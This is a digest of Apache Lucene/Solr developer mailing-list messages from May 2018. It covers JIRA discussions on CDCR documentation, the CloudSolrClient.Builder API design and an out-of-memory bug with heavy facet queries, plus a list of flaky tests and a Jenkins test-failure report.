2018-05-21 Thread Cassandra Targett (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12223?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482867#comment-16482867
 ] 

Cassandra Targett edited comment on SOLR-12223 at 5/21/18 6:29 PM:
---

[~sarkaramr...@gmail.com], I'm taking a look at this (belatedly, sorry), and 
noticed that you left this note in place:

{noformat}
CDCR Bootstrapping
Solr 6.2 added the functionality to allow CDCR to replicate the entire index 
from the Source to the Target
data centers on first time startup as an alternative to the following 
procedure. 
For very large indexes, time should be allocated for the initial 
synchronization if this option is chosen.
{noformat}

I wanted to remove the "Solr 6.2 added..." part of that sentence (not a 
historical document, don't need to explain when stuff was added especially when 
it was years ago), but realized that the rest of it mentions bootstrapping as 
an alternative to the info to follow but without a link to an explanation of 
what to do if you choose that alternative (IOW, the word "bootstrap" only 
occurs once on this page in that place). Also, is that paragraph applicable to 
both uni-directional and bi-directional, or just uni-directional? Its placement 
suggests it applies to both types.


was (Author: ctargett):
[~sarkaramr...@gmail.com], I'm taking a look at this (belatedly, sorry), and 
noticed that you left this note in place:

{noformat}
CDCR Bootstrapping
Solr 6.2 added the functionality to allow CDCR to replicate the entire index 
from the Source to the Target data centers on first time startup as an 
alternative to the following procedure. For very large indexes, time should be 
allocated for the initial synchronization if this option is chosen.
{noformat}

I wanted to remove the "Solr 6.2 added..." part of that sentence (not a 
historical document, don't need to explain when stuff was added especially when 
it was years ago), but realized that the rest of it mentions bootstrapping as 
an alternative to the info to follow but without a link to an explanation of 
what to do if you choose that alternative (IOW, the word "bootstrap" only 
occurs once on this page in that place). Also, is that paragraph applicable to 
both uni-directional and bi-directional, or just uni-directional? Its placement 
suggests it applies to both types.

> Document 'Initial Startup' for bidirectional approach in CDCR
> -
>
> Key: SOLR-12223
> URL: https://issues.apache.org/jira/browse/SOLR-12223
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: CDCR, documentation
>Affects Versions: 7.3
>Reporter: Amrit Sarkar
>Assignee: Cassandra Targett
>Priority: Minor
> Fix For: 7.4
>
> Attachments: SOLR-12223.patch
>
>
> Add {{Initial Startup}} for bidirectional approach to {{cdcr-config.html}}.






[jira] [Commented] (SOLR-12223) Document 'Initial Startup' for bidirectional approach in CDCR

2018-05-21 Thread Cassandra Targett (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12223?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482867#comment-16482867
 ] 

Cassandra Targett commented on SOLR-12223:
--

[~sarkaramr...@gmail.com], I'm taking a look at this (belatedly, sorry), and 
noticed that you left this note in place:

{noformat}
CDCR Bootstrapping
Solr 6.2 added the functionality to allow CDCR to replicate the entire index 
from the Source to the Target data centers on first time startup as an 
alternative to the following procedure. For very large indexes, time should be 
allocated for the initial synchronization if this option is chosen.
{noformat}

I wanted to remove the "Solr 6.2 added..." part of that sentence (not a 
historical document, don't need to explain when stuff was added especially when 
it was years ago), but realized that the rest of it mentions bootstrapping as 
an alternative to the info to follow but without a link to an explanation of 
what to do if you choose that alternative (IOW, the word "bootstrap" only 
occurs once on this page in that place). Also, is that paragraph applicable to 
both uni-directional and bi-directional, or just uni-directional? Its placement 
suggests it applies to both types.







Re: BadApple candidates

2018-05-21 Thread Erick Erickson
Alan:

http://fucit.org/solr-jenkins-reports/job-data/sarowe/Lucene-Solr-Nightly-7.x/256/

You can get there from Hoss's rollup reports here:
http://fucit.org/solr-jenkins-reports/failure-report.html

To be included in any potential BadApple, two things must be true:
1> it must have failed since last Monday
2> it must have failed in the report collected two weeks ago Monday

Erick
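
The two criteria above amount to a set intersection over failure reports. A minimal sketch (the test names are made up for illustration; the real data comes from the rollup reports linked above):

```java
import java.util.HashSet;
import java.util.Set;

// Sketch of the BadApple candidate selection described above: a test
// qualifies only if it failed in the most recent week AND in the report
// collected two weeks ago.
public class BadAppleCandidates {
    public static Set<String> candidates(Set<String> failedThisWeek,
                                         Set<String> failedTwoWeeksAgo) {
        Set<String> result = new HashSet<>(failedThisWeek);
        result.retainAll(failedTwoWeeksAgo); // set intersection
        return result;
    }

    public static void main(String[] args) {
        Set<String> recent = Set.of("TestA.test", "TestB.test");
        Set<String> older = Set.of("TestB.test", "TestC.test");
        System.out.println(candidates(recent, older)); // [TestB.test]
    }
}
```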


On Mon, May 21, 2018 at 12:40 PM, Alan Woodward  wrote:
> When did TestLRUQueryCache fail?  I haven’t seen that one.
>
>> On 21 May 2018, at 16:00, Erick Erickson  wrote:
>>
>> I'm going to change how I collect the badapple candidates. After
>> getting a little
>> overwhelmed by the number of failure e-mails (even ignoring the ones with
>> BadApple enabled), "It come to me in a vision! In a flash!" (points if you
>> know where that comes from, hint: Old music involving a pickle).
>>
>> Since I collect failures for a week and then filter them by what's
>> also in Hoss's
>> results from two weeks ago, that's really equivalent to creating the 
>> candidate
>> list from the intersection of the most recent week of Hoss's results and the
>> results from _three_ weeks ago. Much faster too. Thanks Hoss!
>>
>> So that's what I'll do going forward.
>>
>> Meanwhile, here's the list for this Thursday.
>>
>> BadApple candidates: I'll BadApple these on Thursday unless there are 
>> objections
>> org.apache.lucene.search.TestLRUQueryCache.testBulkScorerLocking
>>  org.apache.solr.TestDistributedSearch.test
>>  org.apache.solr.cloud.AddReplicaTest.test
>>  org.apache.solr.cloud.AssignBackwardCompatibilityTest.test
>>  org.apache.solr.cloud.CreateRoutedAliasTest.testCollectionNamesMustBeAbsent
>>  org.apache.solr.cloud.CreateRoutedAliasTest.testTimezoneAbsoluteDate
>>  org.apache.solr.cloud.CreateRoutedAliasTest.testV1
>>  org.apache.solr.cloud.CreateRoutedAliasTest.testV2
>>  
>> org.apache.solr.cloud.DeleteReplicaTest.raceConditionOnDeleteAndRegisterReplica
>>  org.apache.solr.cloud.LIRRollingUpdatesTest.testNewReplicaOldLeader
>>  org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.basicTest
>>  
>> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.testMostInSyncReplicasCanWinElection
>>  org.apache.solr.cloud.MoveReplicaHDFSTest.testFailedMove
>>  org.apache.solr.cloud.RestartWhileUpdatingTest.test
>>  
>> org.apache.solr.cloud.TestCloudConsistency.testOutOfSyncReplicasCannotBecomeLeader
>>  org.apache.solr.cloud.TestPullReplica.testCreateDelete
>>  org.apache.solr.cloud.TestPullReplica.testKillLeader
>>  org.apache.solr.cloud.TestSolrCloudWithKerberosAlt.testBasics
>>  org.apache.solr.cloud.UnloadDistributedZkTest.test
>>  
>> org.apache.solr.cloud.api.collections.CollectionsAPIAsyncDistributedZkTest.testAsyncRequests
>>  
>> org.apache.solr.cloud.api.collections.CustomCollectionTest.testCustomCollectionsAPI
>>  org.apache.solr.cloud.autoscaling.ComputePlanActionTest.testNodeLost
>>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testMergeIntegration
>>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration
>>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger
>>  org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState
>>  
>> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testBelowSearchRate
>>  
>> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode
>>  org.apache.solr.cloud.autoscaling.SearchRateTriggerTest.testTrigger
>>  org.apache.solr.cloud.hdfs.HdfsUnloadDistributedZkTest.test
>>  org.apache.solr.cloud.hdfs.StressHdfsTest.test
>>  org.apache.solr.handler.TestSQLHandler.doTest
>>  org.apache.solr.security.BasicAuthIntegrationTest.testBasicAuth
>>  org.apache.solr.uninverting.TestDocTermOrds.testTriggerUnInvertLimit
>>  org.apache.solr.update.TestHdfsUpdateLog.testFSThreadSafety
>>  org.apache.solr.update.TestInPlaceUpdatesDistrib.test
>>
>>
>> Number of AwaitsFix: 21 Number of BadApples: 99
>>
>> *AwaitsFix Annotations:
>>
>>
>> Lucene AwaitsFix
>> GeoPolygonTest.java
>>  testLUCENE8276_case3()
>>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8276";)
>>
>> GeoPolygonTest.java
>>  testLUCENE8280()
>>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8280";)
>>
>> GeoPolygonTest.java
>>  testLUCENE8281()
>>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>
>> RandomGeoPolygonTest.java
>>  testCompareBigPolygons()
>>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>
>> RandomGeoPolygonTest.java
>>  testCompareSmallPolygons()
>>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>
>> TestControlledRealTimeReopenThread.java
>>  testCRTReopen()
>>  @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5737";)
>>
>> TestICUNormalizer2CharFilter.java
>>  testRandomStrings()
>>  @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5595";)
>>
>> TestICUTokenizerCJK.j

[jira] [Comment Edited] (SOLR-12309) CloudSolrClient.Builder constructors are not well documented

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12309?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482814#comment-16482814
 ] 

Shawn Heisey edited comment on SOLR-12309 at 5/21/18 6:02 PM:
--

This issue started out as confusion over how Optional worked, and desiring 
better javadoc.  And maybe that's where it should stay.  Design shifts can 
happen in another issue.

On the design:  I think the mix of constructors and fluent methods confuses the 
situation and gives an impression that we're undecided about whether we want 
fluent or not.

Here's another idea, sort of a meld of both approaches, abandoning the use of 
constructors, and a lot less complicated than what I last proposed.  Implement 
these static methods, as the only non-deprecated ways of obtaining a Builder 
object:

CloudSolrClient.builder(Collection zkHosts, String chroot)
CloudSolrClient.builder(Collection solrUrls)

If there's no chroot, that argument can be null, which most Java developers 
understand fully.  There may still be situations where using certain fluent 
methods might throw Illegal* exceptions, but there wouldn't be very many 
situations like that.

I think the other SolrClient implementations can get by with one builder() 
method that includes all required arguments.



was (Author: elyograg):
This issue started out as confusion over how Optional worked, and desiring 
better javadoc.  And maybe that's where it should stay.  Design shifts can 
happen in another issue.

On the design:  I think the mix of constructors and fluent methods confuses the 
situation and gives an impression that we're undecided about whether we want 
fluent or not.

Here's another idea, sort of a meld of both approaches, abandoning the use of 
constructors, and a lot less complicated than what I last proposed.  Implement 
these static methods, as the only non-deprecated ways of obtaining a Builder 
object:

CloudSolrClient.builder(Collection zkHosts, String chroot)
CloudSolrClient.builder(Collection solrUrls)

If there's no chroot, that argument can be null, which most Java developers 
understand fully.  There may still be situations where using certain fluent 
methods might throw Illegal* exceptions, but there wouldn't be very many 
situations like that.

I think the other SolrClient implementations can get by with a single no-arg 
builder() method.


> CloudSolrClient.Builder constructors are not well documented
> 
>
> Key: SOLR-12309
> URL: https://issues.apache.org/jira/browse/SOLR-12309
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: clients - java
>Affects Versions: 7.3
>Reporter: Shawn Heisey
>Priority: Minor
> Attachments: fluent-builder-fail-compile-time.patch
>
>
> I was having a lot of trouble figuring out how to create a CloudSolrClient 
> object without using deprecated code.
> The no-arg constructor on the Builder object is deprecated, and the two 
> remaining methods have similar signatures to each other.  It is not at all 
> obvious how to successfully call the one that uses ZooKeeper to connect.  The 
> javadoc is silent on the issue.  I did finally figure it out with a lot of 
> googling, and I would like to save others the hassle.
> I believe that this is what the javadoc for the third ctor should say:
> 
> Provide a series of ZooKeeper hosts which will be used when configuring 
> CloudSolrClient instances.  Optionally, include a chroot to be used when 
> accessing the ZooKeeper database.
> Here are a couple of examples.  The first one has no chroot, the second one 
> does:
> new CloudSolrClient.Builder(zkHosts, Optional.empty())
> new CloudSolrClient.Builder(zkHosts, Optional.of("/solr"))
> 
> The javadoc for the URL-based method should probably say something to 
> indicate that it is easy to confuse with the ZK-based method.
> I have not yet looked at the current reference guide to see if that has any 
> clarification.
> Is it a good idea to completely eliminate the ability to create a cloud 
> client using a single string that matches the zkHost value used when starting 
> Solr in cloud mode?






[jira] [Comment Edited] (SOLR-12309) CloudSolrClient.Builder constructors are not well documented

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12309?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482814#comment-16482814
 ] 

Shawn Heisey edited comment on SOLR-12309 at 5/21/18 5:55 PM:
--

This issue started out as confusion over how Optional worked, and desiring 
better javadoc.  And maybe that's where it should stay.  Design shifts can 
happen in another issue.

On the design:  I think the mix of constructors and fluent methods confuses the 
situation and gives an impression that we're undecided about whether we want 
fluent or not.

Here's another idea, sort of a meld of both approaches, abandoning the use of 
constructors, and a lot less complicated than what I last proposed.  Implement 
these static methods, as the only non-deprecated ways of obtaining a Builder 
object:

CloudSolrClient.builder(Collection zkHosts, String chroot)
CloudSolrClient.builder(Collection solrUrls)

If there's no chroot, that argument can be null, which most Java developers 
understand fully.  There may still be situations where using certain fluent 
methods might throw Illegal* exceptions, but there wouldn't be very many 
situations like that.

I think the other SolrClient implementations can get by with a single no-arg 
builder() method.



was (Author: elyograg):
This issue started out as confusion over how Optional worked, and desiring 
better javadoc.  And maybe that's where it should stay.  Design shifts can 
happen in another issue.

On the design:  I think the mix of constructors and fluent methods confuses the 
situation and gives an impression that we're undecided about whether we want 
fluent or not.

Here's another idea, sort of a meld of both approaches, abandoning the use of 
constructors, and a lot less complicated than what I last proposed.  Implement 
these static methods:

CloudSolrClient.builder(Collection zkHosts, String chroot)
CloudSolrClient.builder(Collection solrUrls)

If there's no chroot, that argument can be null, which most Java developers 
understand fully.  There may still be situations where using certain fluent 
methods might throw Illegal* exceptions, but there wouldn't be very many 
situations like that.

I think the other SolrClient implementations can get by with a single no-arg 
builder() method.








[jira] [Commented] (SOLR-12309) CloudSolrClient.Builder constructors are not well documented

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12309?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482814#comment-16482814
 ] 

Shawn Heisey commented on SOLR-12309:
-

This issue started out as confusion over how Optional worked, and desiring 
better javadoc.  And maybe that's where it should stay.  Design shifts can 
happen in another issue.

On the design:  I think the mix of constructors and fluent methods confuses the 
situation and gives an impression that we're undecided about whether we want 
fluent or not.

Here's another idea, sort of a meld of both approaches, abandoning the use of 
constructors, and a lot less complicated than what I last proposed.  Implement 
these static methods:

CloudSolrClient.builder(Collection zkHosts, String chroot)
CloudSolrClient.builder(Collection solrUrls)

If there's no chroot, that argument can be null, which most Java developers 
understand fully.  There may still be situations where using certain fluent 
methods might throw Illegal* exceptions, but there wouldn't be very many 
situations like that.

I think the other SolrClient implementations can get by with a single no-arg 
builder() method.








[JENKINS] Lucene-Solr-7.x-Solaris (64bit/jdk1.8.0) - Build # 638 - Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-7.x-Solaris/638/
Java: 64bit/jdk1.8.0 -XX:+UseCompressedOops -XX:+UseParallelGC

14 tests failed.
FAILED:  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger

Error Message:
number of ops expected:<2> but was:<1>

Stack Trace:
java.lang.AssertionError: number of ops expected:<2> but was:<1>
at 
__randomizedtesting.SeedInfo.seed([2D91BFF4BEC51F5D:4E5A8976270A6C70]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.failNotEquals(Assert.java:647)
at org.junit.Assert.assertEquals(Assert.java:128)
at org.junit.Assert.assertEquals(Assert.java:472)
at 
org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger(IndexSizeTriggerTest.java:187)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at java.lang.Thread.run(Thread.java:748)


FAILED:  
org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration

Error Message:
last state: 
DocCollection(testSplitIntegr

[jira] [Commented] (LUCENE-8324) Unreferenced files of dropped segments should be released

2018-05-21 Thread Michael McCandless (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8324?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482797#comment-16482797
 ] 

Michael McCandless commented on LUCENE-8324:


+1




--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Resolved] (SOLR-12381) facet query causes down replicas

2018-05-21 Thread Mikhail Khludnev (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12381?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Mikhail Khludnev resolved SOLR-12381.
-
Resolution: Won't Fix

The max heap size should be set below the oom_killer boundary; in that case 
Solr has a chance to respond with an OOME, and starting from 7.3 Solr survives 
it. 
Anyway, for -the sane- regular cases the suggestion is to use docValues, but 
given the name of the field, that's not an option. 

> facet query causes down replicas
> 
>
> Key: SOLR-12381
> URL: https://issues.apache.org/jira/browse/SOLR-12381
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 6.6.1
>Reporter: kiarash
>Priority: Major
>
> Cluster description:
> I have a Solr cluster with 3 nodes (node1, node2, node3).
> Each node has:
> 30 GB memory
> 3 TB SATA disk
> My cluster involves 5 collections which together contain more than a billion 
> documents.
> I have a collection (the news_archive collection) which contains 30 million 
> documents. This collection is divided into 3 shards, each of which contains 
> 10 million documents and occupies 100 GB on disk. Each of the shards has 3 
> replicas.
> Each of the cluster nodes contains one of the replicas of each shard. In 
> fact, the nodes are identical, i.e.:
> node1 contains:
> shard1_replica1
> shard2_replica1
> shard3_replica1
> node2 contains:
> shard1_replica2
> shard2_replica2
> shard3_replica2
> node3 contains:
> shard1_replica3
> shard2_replica3
> shard3_replica3
> Problem description:
> When I run a heavy facet query, 
> such as 
> http://Node1IP:/solr/news_archive/select?q=*:*&fq=pubDate:[2018-1-18T12:06:57Z%20TO%202018-4-18T12:06:57Z]&facet.field=ngram_content&facet=true&facet.mincount=1&facet.limit=2000&rows=0&wt=json,
>  the Solr instances are killed by the OOM killer on almost all of the nodes.
> I found the below log in 
> solr/logs/solr_oom_killer--2018-05-21_19_17_41.log on each of the Solr 
> instances:
> "Running OOM killer script for process 2766 for Solr on port 
> Killed process 2766"
> It seems that the query is routed to different nodes of the cluster, and 
> given the exhaustive memory use caused by the query, the Solr instances are 
> killed by the OOM killer.
>  
> Regardless of how memory-demanding the query is, I think the cluster's nodes 
> should be protected from being killed by any read query, 
> for example by limiting the amount of memory that can be used by any query.






[jira] [Commented] (SOLR-12309) CloudSolrClient.Builder constructors are not well documented

2018-05-21 Thread Jason Gerlowski (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12309?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482726#comment-16482726
 ] 

Jason Gerlowski commented on SOLR-12309:


Hmm, it's an interesting idea.  And I appreciate your humoring me in getting 
back the compile-time guidance/errors.  I guess I'm just stuck on understanding 
your underlying motivation for wanting to get the no-arg ctors back.  I can see 
a few reasons that'd make sense; I'm just wondering which ones you're 
interested in, and how this patch helps them.

Is your concern a slippery-slope explosion of ctors if SolrJ gains some more 
required arguments in the future?  Is your goal to make the Builder more 
fluent, and you see eliminating ctor arguments as a step towards that?  Or do 
you think this is more intuitive from an end-user perspective than the 
currently committed ctors/approach?  Or is there some other motivation?

Your patch does regain a no-arg ctor of sorts, but the next method call MUST be 
to provide the zk-host/url-list; you can't call setters in whatever order you 
please.  IMO that undercuts any gains in "fluent"-ness and leaves things 
looking oddly similar to the interface/ctors we have currently. 

Maybe you prefer this approach because it prevents a potential ctor 
explosion if other SolrClient arguments become required.  But I'm not sure 
whether it prevents the explosion, or just shuffles the "bomb" around to other 
types (tiny Builder implementations).

I guess at this point my vote is still to improve the Javadocs and other 
documentation around this, rather than reworking the interface.  But I'm happy 
to be overruled or have my misconceptions corrected.  I'll unassign myself in 
case you want to pursue a non-documentation solution.  I'll still work on the 
Javadocs independently; they'll be useful for devs in the interim even if we 
end up changing the interface going forward.
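For what it's worth, the "next call MUST provide the zk-host/url-list" shape can be sketched as a staged builder in plain Java. This is an illustrative sketch only; none of the class or method names below are SolrJ's actual API:

```java
import java.util.List;
import java.util.Optional;

// Hypothetical staged builder: the no-arg entry point exposes only the
// required zk-host step; the optional setters only become available after
// that step has run, so misuse fails at compile time.
class CloudClientConfig {
    final List<String> zkHosts;
    final Optional<String> zkChroot;
    final int socketTimeoutMillis;

    private CloudClientConfig(List<String> zkHosts, Optional<String> zkChroot,
                              int socketTimeoutMillis) {
        this.zkHosts = zkHosts;
        this.zkChroot = zkChroot;
        this.socketTimeoutMillis = socketTimeoutMillis;
    }

    // No-arg entry point: returns the "tiny builder" that forces the
    // required argument before anything else can be chained.
    static RequiredStep builder() {
        return new RequiredStep();
    }

    static class RequiredStep {
        // The only available call: supply the ZooKeeper hosts and chroot.
        OptionalSteps withZkHosts(List<String> hosts, Optional<String> chroot) {
            return new OptionalSteps(hosts, chroot);
        }
    }

    static class OptionalSteps {
        private final List<String> hosts;
        private final Optional<String> chroot;
        private int socketTimeoutMillis = 15000; // illustrative default

        private OptionalSteps(List<String> hosts, Optional<String> chroot) {
            this.hosts = hosts;
            this.chroot = chroot;
        }

        // Optional setters can now be chained in any order.
        OptionalSteps withSocketTimeout(int millis) {
            this.socketTimeoutMillis = millis;
            return this;
        }

        CloudClientConfig build() {
            return new CloudClientConfig(hosts, chroot, socketTimeoutMillis);
        }
    }
}
```

The compiler rejects `builder().withSocketTimeout(...)` because the setter simply doesn't exist until the zk-host step has run — the compile-time guidance discussed above, at the cost of one extra tiny builder type per required argument.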

> CloudSolrClient.Builder constructors are not well documented
> 
>
> Key: SOLR-12309
> URL: https://issues.apache.org/jira/browse/SOLR-12309
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: clients - java
>Affects Versions: 7.3
>Reporter: Shawn Heisey
>Assignee: Jason Gerlowski
>Priority: Minor
> Attachments: fluent-builder-fail-compile-time.patch
>
>
> I was having a lot of trouble figuring out how to create a CloudSolrClient 
> object without using deprecated code.
> The no-arg constructor on the Builder object is deprecated, and the two 
> remaining methods have similar signatures to each other.  It is not at all 
> obvious how to successfully call the one that uses ZooKeeper to connect.  The 
> javadoc is silent on the issue.  I did finally figure it out with a lot of 
> googling, and I would like to save others the hassle.
> I believe that this is what the javadoc for the third ctor should say:
> 
> Provide a series of ZooKeeper hosts which will be used when configuring 
> CloudSolrClient instances.  Optionally, include a chroot to be used when 
> accessing the ZooKeeper database.
> Here are a couple of examples.  The first one has no chroot, the second one 
> does:
> new CloudSolrClient.Builder(zkHosts, Optional.empty())
> new CloudSolrClient.Builder(zkHosts, Optional.of("/solr"))
> 
> The javadoc for the URL-based method should probably say something to 
> indicate that it is easy to confuse with the ZK-based method.
> I have not yet looked at the current reference guide to see if that has any 
> clarification.
> Is it a good idea to completely eliminate the ability to create a cloud 
> client using a single string that matches the zkHost value used when starting 
> Solr in cloud mode?






[jira] [Assigned] (SOLR-12309) CloudSolrClient.Builder constructors are not well documented

2018-05-21 Thread Jason Gerlowski (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12309?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jason Gerlowski reassigned SOLR-12309:
--

Assignee: (was: Jason Gerlowski)

> CloudSolrClient.Builder constructors are not well documented
> 
>
> Key: SOLR-12309
> URL: https://issues.apache.org/jira/browse/SOLR-12309
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: clients - java
>Affects Versions: 7.3
>Reporter: Shawn Heisey
>Priority: Minor
> Attachments: fluent-builder-fail-compile-time.patch
>
>
> I was having a lot of trouble figuring out how to create a CloudSolrClient 
> object without using deprecated code.
> The no-arg constructor on the Builder object is deprecated, and the two 
> remaining methods have similar signatures to each other.  It is not at all 
> obvious how to successfully call the one that uses ZooKeeper to connect.  The 
> javadoc is silent on the issue.  I did finally figure it out with a lot of 
> googling, and I would like to save others the hassle.
> I believe that this is what the javadoc for the third ctor should say:
> 
> Provide a series of ZooKeeper hosts which will be used when configuring 
> CloudSolrClient instances.  Optionally, include a chroot to be used when 
> accessing the ZooKeeper database.
> Here are a couple of examples.  The first one has no chroot, the second one 
> does:
> new CloudSolrClient.Builder(zkHosts, Optional.empty())
> new CloudSolrClient.Builder(zkHosts, Optional.of("/solr"))
> 
> The javadoc for the URL-based method should probably say something to 
> indicate that it is easy to confuse with the ZK-based method.
> I have not yet looked at the current reference guide to see if that has any 
> clarification.
> Is it a good idea to completely eliminate the ability to create a cloud 
> client using a single string that matches the zkHost value used when starting 
> Solr in cloud mode?






[jira] [Created] (SOLR-12381) facet query causes down replicas

2018-05-21 Thread kiarash (JIRA)
kiarash created SOLR-12381:
--

 Summary: facet query causes down replicas
 Key: SOLR-12381
 URL: https://issues.apache.org/jira/browse/SOLR-12381
 Project: Solr
  Issue Type: Bug
  Security Level: Public (Default Security Level. Issues are Public)
Affects Versions: 6.6.1
Reporter: kiarash


Cluster description:


I have a Solr cluster with 3 nodes (node1, node2, node3).

Each node has:
30 GB memory
3 TB SATA disk

My cluster involves 5 collections which together contain more than a billion 
documents.

